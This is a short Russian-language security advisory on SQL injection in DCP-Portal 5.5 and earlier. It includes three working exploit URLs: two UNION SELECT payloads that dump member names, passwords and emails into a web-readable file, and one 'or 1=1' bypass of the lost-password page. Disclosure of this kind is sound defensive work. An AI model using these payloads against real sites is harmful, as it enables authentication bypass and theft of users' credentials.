Программа: DCP-Portal 5.5 и более ранние версии 

Уязвимость обнаружена в DCP-Portal 5.x. Удаленный атакующий может выполнить произвольный SQL код на основной базе данных.
DCP-Portal не проверяет данные, представленные пользователем, перед передачей их к динамическому SQL запросу в различных параметрах и сценариях. В результате удаленный пользователь может манипулировать SQL запросом, чтобы обойти идентификацию, манипулировать данными и извлекать произвольные данные. 

Пример/Эксплоит: 

http://localhost/dcp/advertiser.php? adv_logged=1&username=1&password=qwe’
or 1=1 UNION select uid,name,password,surname,job,email from dcp5_members into outfile ‘c:/apache2/htdocs/dcpad.txt

http://localhost/dcp/advertiser.php?adv_logged=1&username=1&password=qwe’
or 1=1 UNION select uid,name,password,surname,job,email from dcp5_members into outfile
‘/var/www/html/dcpad.txt

http://localhost/dcp/lostpassword.php?action=lost&email=fake’ or 1=1—‘



Оставить мнение